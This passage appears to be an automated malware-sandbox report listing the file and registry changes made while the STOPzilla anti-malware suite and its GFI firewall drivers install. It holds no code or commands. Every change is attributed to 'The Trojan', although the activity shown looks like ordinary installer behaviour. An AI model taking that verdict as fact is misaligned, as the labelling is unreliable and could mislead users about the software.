%Program Files% (x86)\STOPzilla\Definitions\Staging\HistoryCleaner.xml (5951 bytes)
C:\ProgramData\STOPzilla!\Logs\SBAMSvcLog.csv (1383028 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ctid.vtd (341308 bytes)
%Program Files% (x86)\STOPzilla\Definitions\cname.wtd (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\elf_hash.dat (528 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\qscnr.vdx (80 bytes)
The process %original file name%.exe:1912 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TarF5E3.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A4B782275DC1682E4DC39E697A49B151 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 (656 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CabF5E2.tmp (48 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\STOPzilla7.msi (1643823 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A4B782275DC1682E4DC39E697A49B151 (412 bytes)
The process runonce.exe:3092 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl (712 bytes)
The process runonce.exe:2736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl (712 bytes)
The process GFI.Tools.Run64.exe:1928 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\STOPzilla\SBSetupDrivers.exe (180 bytes)
The process DrvInst.exe:2212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\System32\DriverStore\infpub.dat (252 bytes)
C:\Windows\System32\DriverStore\Temp\{4f69f560-3dc5-07a7-53cf-bd6e4eaaf72f}\SETDC0D.tmp (3 bytes)
C:\Windows\System32\DriverStore\Temp\{4f69f560-3dc5-07a7-53cf-bd6e4eaaf72f}\SETDBFC.tmp (8 bytes)
C:\Windows\System32\DriverStore\infstrng.dat (1764 bytes)
C:\Windows\System32\DriverStore\INFCACHE.0 (1861 bytes)
C:\Windows\System32\DriverStore\infstor.dat (940 bytes)
C:\Windows\inf\oem13.inf (3 bytes)
C:\Windows\System32\DriverStore\Temp\{4f69f560-3dc5-07a7-53cf-bd6e4eaaf72f}\amd64\wnet\SETDC0E.tmp (601 bytes)
C:\Windows\System32\DriverStore\FileRepository\sbfwim.inf_amd64_neutral_09abe461a7fb864d\sbfwim.PNF (8464 bytes)
The process DrvInst.exe:1680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\System32\DriverStore\infpub.dat (252 bytes)
C:\Windows\System32\DriverStore\Temp\{43a08643-c069-7a03-1bae-01365fc66a22}\SETDDE0.tmp (8 bytes)
C:\Windows\inf\oem14.inf (1 bytes)
C:\Windows\System32\DriverStore\infstrng.dat (1628 bytes)
C:\Windows\System32\DriverStore\INFCACHE.0 (1325 bytes)
C:\Windows\System32\DriverStore\infstor.dat (748 bytes)
C:\Windows\System32\DriverStore\Temp\{43a08643-c069-7a03-1bae-01365fc66a22}\SETDDF0.tmp (1 bytes)
C:\Windows\System32\DriverStore\FileRepository\sbfwim_m.inf_amd64_neutral_9058dec7bb12b258\sbfwim_m.PNF (4811 bytes)
The process STOPzilla.exe:3836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\STOPzilla!\Logs\S-1-5-21-2858020935-2156992550-3658131804-1003.stopzilla7.log (24142 bytes)
C:\ProgramData\STOPzilla!\sz7.data-journal (4518 bytes)
C:\ProgramData\STOPzilla!\sz7.data (1853 bytes)
The process RUNDLL32.exe:3528 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Temp\OLD168C.tmp (601 bytes)
C:\Windows\System32\drivers\SET169B.tmp (691 bytes)
The process regsvr32.exe:3500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\STOPzilla\x64\SBAMSvcPS.dll (69 bytes)
The process regsvr32.exe:1496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll (446 bytes)
The process SZNetAssistant.exe:3916 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Temp\cfc791fe-c515-4b74-a3d5-bd35083fed43 (223 bytes)
C:\Windows\Temp\b547cdad-d8a5-4d61-95a2-f7616170c67e (223 bytes)
C:\Windows\Temp\ae0b2b8c-b2b5-4e50-b7ff-769522044179 (223 bytes)
C:\ProgramData\STOPzilla!\Logs\sz-net-assist.log (19768668 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A4B782275DC1682E4DC39E697A49B151 (1 bytes)
C:\Windows\Temp\fff275e4-419b-48fe-963a-c0011a05bfb9 (48733 bytes)
C:\Windows\Temp\037d4f6a-0574-4316-b003-d803b0bc2577 (24945 bytes)
C:\Windows\Temp\4c7c3001-c7cf-4f43-88e1-0f52a08e06a9 (223 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A4B782275DC1682E4DC39E697A49B151 (412 bytes)
C:\Windows\Temp\59db4a19-a509-4b93-b854-13678662fd8f (10071 bytes)
C:\Windows\Temp\bbe27e88-1190-4118-a730-4f9519d6c74d (30169149 bytes)
C:\Windows\Temp\7f53ae67-47b8-4bf2-aad3-054d5e7e2bf1 (223 bytes)
C:\Windows\Temp\73901abc-e30f-42ed-898e-68cb9217849e (223 bytes)
The process SZServer.exe:3384 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\STOPzilla!\sz7.data-journal (86080 bytes)
C:\ProgramData\STOPzilla!\sz7.data (35985 bytes)
C:\ProgramData\STOPzilla!\Logs\sz7.log (78551 bytes)
The process SZServer.exe:992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\STOPzilla!\sz7.data-journal (129706 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_o4arGwZ2LOh436Q (80 bytes)
C:\Windows\SysWOW64\msvcr120.dll (974 bytes)
C:\ProgramData\STOPzilla!\Logs\sz7-msi.log (18618 bytes)
C:\ProgramData\STOPzilla!\sz7.data (22161 bytes)
%Program Files% (x86)\STOPzilla\GFI.Tools.Run64.exe (192 bytes)
C:\Windows\SysWOW64\msvcp120.dll (458 bytes)
The process SZWSC.exe:3788 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\STOPzilla!\Logs\wsc.log (6794 bytes)
The process SZWSC.exe:2612 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\STOPzilla!\Logs\wsc.log (11204 bytes)
The process MsiExec.exe:2456 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI16DA.tmp (159 bytes)
Registry activity
The process SBSetupDrivers.exe:3152 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\services\SbFw]
"Start" = "1"
"ErrorControl" = "1"
"Type" = "1"
"ImagePath" = "system32\drivers\SbFw.sys"
"AlwaysSecure" = "0"
"Tag" = "12"
"DisplayName" = "SbFw"
"AdapterNotificationDisabled" = "0"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0B 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\services\SbFw]
"DependOnService" = "tdx,"
"Group" = "PNP_TDI"
"StatInspEnabled" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\services\SbFw]
The process SBSetupDrivers.exe:1812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0005\Linkage]
"UpperBind" = "Wanarpv6"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012\Linkage]
"RootDevice" = "{E73BBB69-B487-482C-A52B-439651CE880D}, {4AB0D2BA-E805-472C-9283-2A108EC5CAE2}"
[HKLM\System\CurrentControlSet\services\SBFWIMCLMP]
"BlockIPv6" = "0"
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi\Interfaces]
"FilterMediaTypes" = "ethernet, wan"
[HKLM\System\CurrentControlSet\Enum\Root\SB_SBFWIMCLMP\0000\Device Parameters]
"InstanceIndex" = "1"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"FilterClass" = "failover"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0008\Linkage]
"RootDevice" = "NdisWanIp"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"NetLuidIndex" = "3"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"*IfType" = "1"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012\Linkage]
"UpperBind" = "Ndisuio, RasPppoe, rspndr, lltdio, Tcpip"
[HKLM\SYSTEM\Setup\SetupapiLogStatus]
"setupapi.app.log" = "4096"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"NetLuidIndex" = "2"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"NewDeviceInstall" = "1"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0008\Linkage]
"UpperBind" = "Wanarp"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014\Ndi]
"Service" = "SBFWIMCLMP"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"Characteristics" = "41"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"DeviceInstanceID" = "ROOT\SB_SBFWIMCLMP\0001"
"NewDeviceInstall" = "1"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0006\Linkage]
"RootDevice" = "NdisWanBh"
[HKLM\System\CurrentControlSet\Control\Nsi\{eb004a11-9b1a-11d4-9123-0050047759bc}\10]
"0000000100000100" = "AE 01 84 04 32 00 4C 00 6F 00 63 00 61 00 6C 00"
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}]
"Description" = "GFI Software Firewall NDIS IM Filter"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"sstpsvc.dll,-203" = "Allows you to securely connect to a private network using the Internet."
[HKLM\System\CurrentControlSet\services\SBFWIMCL\Parameters\Adapters\NdisWanIpv6]
"UpperBindings" = "\Device\{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"*IfType" = "1"
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi\Interfaces]
"LowerRange" = "nolower"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Linkage]
"UpperBind" = ""
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"FilterClass" = "failover"
[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{E73BBB69-B487-482C-A52B-439651CE880D}\Connection]
"Name" = "Local Area Connection* 9"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"DeviceInstanceID" = "ROOT\SB_SBFWIMCLMP\0003"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"FilterInfId" = "sb_sbfwimcl"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\System32\drivers]
"pacer.sys,-100" = "Quality of Service Packet Scheduler. This component provides network traffic control, including rate-of-flow and prioritization services."
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi]
"FilterDeviceInfFile" = "sbfwim_m.inf"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0007\Linkage]
"Export" = "\Device\{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}"
[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}\Connection]
"Name" = "Local Area Connection* 12"
[HKLM\System\CurrentControlSet\Enum\Root\SB_SBFWIMCLMP\0002\Device Parameters]
"InstanceIndex" = "3"
[HKLM\System\CurrentControlSet\services\eventlog\System\Anti-Spyware Filter]
"EventMessageFile" = "%SystemRoot%\System32\drivers\sbapifs.sys"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"DeviceInstanceID" = "ROOT\SB_SBFWIMCLMP\0002"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"FilterInfId" = "sb_sbfwimcl"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"FilterInfId" = "sb_sbfwimcl"
[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}\Connection]
"Name" = "Local Area Connection* 14"
[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}\Connection]
"DefaultNameIndex" = "13"
[HKLM\System\CurrentControlSet\Control\Nsi\{eb004a11-9b1a-11d4-9123-0050047759bc}\10]
"0000000300000100" = "AE 01 84 04 32 00 4C 00 6F 00 63 00 61 00 6C 00"
[HKLM\System\CurrentControlSet\Enum\Root\SB_SBFWIMCLMP\0001\Device Parameters]
"InstanceIndex" = "2"
[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}\Connection]
"DefaultNameIndex" = "14"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0007\Linkage]
"RootDevice" = "{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}"
[HKLM\System\CurrentControlSet\services\SbFw]
"StatInspEnabled" = "1"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"ComponentID" = "sb_sbfwimclmp"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"Characteristics" = "41"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"rascfg.dll,-32008" = "Allows you to securely connect to a private network using the Internet."
"rascfg.dll,-32009" = "Allows you to securely connect to a private network using the Internet."
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Linkage]
"RootDevice" = "{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}, NdisWanBh"
[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}\Connection]
"Name" = "Local Area Connection* 13"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"ComponentID" = "sb_sbfwimclmp"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"@netcfgx.dll,-50003" = "Allows other computers to access resources on your computer using a Microsoft network."
"@netcfgx.dll,-50002" = "Allows your computer to access resources on a Microsoft network."
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"FilterClass" = "failover"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0007\Linkage]
"UpperBind" = "Ndisuio, RasPppoe, rspndr, lltdio, Tcpip"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012\Ndi]
"Service" = "SBFWIMCLMP"
[HKLM\System\CurrentControlSet\Control\Nsi\{eb004a11-9b1a-11d4-9123-0050047759bc}\10]
"0000000000000100" = "AE 01 84 04 30 00 4C 00 6F 00 63 00 61 00 6C 00"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014\Linkage]
"FilterList" = "{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}-{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000"
[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{E73BBB69-B487-482C-A52B-439651CE880D}\Connection]
"DefaultNameIndex" = "9"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"Characteristics" = "41"
[HKLM\System\CurrentControlSet\services\SbFw]
"AdapterNotificationDisabled" = "0"
[HKLM\System\CurrentControlSet\services\NDIS\IfTypes\1]
"IfUsedNetLuidIndices" = "01"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"Characteristics" = "41"
[HKLM\System\CurrentControlSet\services\sbapifs\Instances\ActiveProtection]
"Altitude" = "268000"
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi]
"Service" = "SBFWIMCL"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"@tcpipcfg.dll,-50002" = "TCP/IP version 6. The latest version of the internet protocol that provides communication across diverse interconnected networks."
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi]
"HelpText" = "GFI Software Firewall NDIS IM Filter"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Linkage]
"Export" = "\Device\{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}"
[HKLM\System\CurrentControlSet\Services\NdisWan\Linkage]
"Export" = "\Device\NdisWan_{D720734D-0C14-4C25-829D-F6B4814978B3}, \Device\NdisWan_{50CD5E3E-0F08-4519-A9EF-B9802ED12701}, \Device\NdisWan_{5D403E7A-7554-4DD5-A8CF-7099B00A9E2D}, \Device\NdisWan_{B22E8C55-CC74-4FBE-B907-F46D25953BEC}, \Device\NdisWan_{CACEFAA3-95D9-4B5B-B275-FF35DF23713E}, \Device\NdisWan_{CFCD29B3-A836-426F-8329-8362EC941293}"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012\Linkage]
"Export" = "\Device\{E73BBB69-B487-482C-A52B-439651CE880D}"
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}]
"LocDescription" = "@oem13.inf,%sbfwimcl_desc%;GFI Software Firewall NDIS IM Filter"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Ndi]
"Service" = "SBFWIMCLMP"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0B 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017\Linkage]
"Export" = "\Device\{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014\Linkage]
"UpperBind" = "Wanarp"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0005\Linkage]
"Export" = "\Device\NdisWanIpv6"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"NetCfgInstanceId" = "{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}"
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi\Interfaces]
"LowerExclude" = "ndisatm, ndiscowan, ndiswan, ndiswanasync, ndiswanipx, ndiswannbf"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0007]
"NetCfgInstanceId" = "{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"NetLuidIndex" = "1"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012\Linkage]
"FilterList" = "{E73BBB69-B487-482C-A52B-439651CE880D}-{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000, {E73BBB69-B487-482C-A52B-439651CE880D}-{B70D6460-3635-4D42-B866-B8AB1A24454C}-0000"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"NewDeviceInstall" = "1"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017\Linkage]
"FilterList" = "{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}-{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000"
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Parameters]
"Param1" = "4"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0006\Linkage]
"Export" = "\Device\NdisWanBh"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"InstallTimestamp" = "DF 07 04 00 06 00 19 00 01 00 10 00 39 00 92 02"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"FilterClass" = "failover"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"InstallTimestamp" = "DF 07 04 00 06 00 19 00 01 00 10 00 39 00 1B 01"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"InstallTimestamp" = "DF 07 04 00 06 00 19 00 01 00 10 00 39 00 E6 01"
[HKLM\System\CurrentControlSet\Control\Network]
"Config" = "00 00 00 00 00 00 00 00 2B 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi]
"FilterClass" = "failover"
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}]
"InstallTimestamp" = "DF 07 04 00 06 00 19 00 01 00 10 00 38 00 3F 03"
"Characteristics" = "17424"
[HKLM\System\CurrentControlSet\services\SBFWIMCLMP]
"AdapterNotificationDisabled" = "0"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"ComponentID" = "sb_sbfwimclmp"
[HKLM\System\CurrentControlSet\Services\NdisWan\Linkage]
"Bind" = "\Device\{D720734D-0C14-4C25-829D-F6B4814978B3}, \Device\{50CD5E3E-0F08-4519-A9EF-B9802ED12701}, \Device\{5D403E7A-7554-4DD5-A8CF-7099B00A9E2D}, \Device\{B22E8C55-CC74-4FBE-B907-F46D25953BEC}, \Device\{CACEFAA3-95D9-4B5B-B275-FF35DF23713E}, \Device\{CFCD29B3-A836-426F-8329-8362EC941293}"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0006\Linkage]
"UpperBind" = ""
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017\Linkage]
"UpperBind" = "Wanarpv6"
[HKLM\System\CurrentControlSet\services\SbFw]
"AlwaysSecure" = "0"
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}]
"InfPath" = "C:\Windows\INF\oem13.inf"
[HKLM\System\CurrentControlSet\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0017\Ndi]
"Service" = "SBFWIMCLMP"
[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}\Connection]
"DefaultNameResourceId" = "1801"
[HKLM\System\CurrentControlSet\services\eventlog\System\Anti-Spyware Filter]
"TypesSupported" = "7"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0008\Linkage]
"Export" = "\Device\NdisWanIp"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"InstallTimestamp" = "DF 07 04 00 06 00 19 00 01 00 10 00 39 00 60 00"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0006]
"NetCfgInstanceId" = "{B1422D78-82BA-4FD0-B38A-6203899A1A72}"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"rascfg.dll,-32010" = "Provides the abilitiy to connect a host to a Remote Access Concentrator that supports RFC2516."
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}]
"InfSection" = "SBFWIMCL.ndi"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"NetCfgInstanceId" = "{E73BBB69-B487-482C-A52B-439651CE880D}"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}\Connection]
"DefaultNameIndex" = "12"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0005\Linkage]
"RootDevice" = "NdisWanIpv6"
[HKLM\System\CurrentControlSet\services\sbapifs]
"SupportedFeatures" = "3"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0005]
"NetCfgInstanceId" = "{0D252192-084F-4C37-8DED-14986BA82F63}"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"NetCfgInstanceId" = "{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"NewDeviceInstall" = "1"
[HKLM\System\CurrentControlSet\services\SBFWIMCL\Parameters\Adapters\{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}]
"UpperBindings" = "\Device\{E73BBB69-B487-482C-A52B-439651CE880D}"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"NetLuidIndex" = "0"
[HKLM\System\CurrentControlSet\services\SBFWIMCL\Parameters\Adapters\NdisWanIp]
"UpperBindings" = "\Device\{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}"
[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{E73BBB69-B487-482C-A52B-439651CE880D}\Connection]
"DefaultNameResourceId" = "1801"
[HKLM\System\CurrentControlSet\Services\NdisWan\Linkage]
"Route" = "{D720734D-0C14-4C25-829D-F6B4814978B3}, {50CD5E3E-0F08-4519-A9EF-B9802ED12701}, {5D403E7A-7554-4DD5-A8CF-7099B00A9E2D}, {B22E8C55-CC74-4FBE-B907-F46D25953BEC}, {CACEFAA3-95D9-4B5B-B275-FF35DF23713E}, {CFCD29B3-A836-426F-8329-8362EC941293}"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
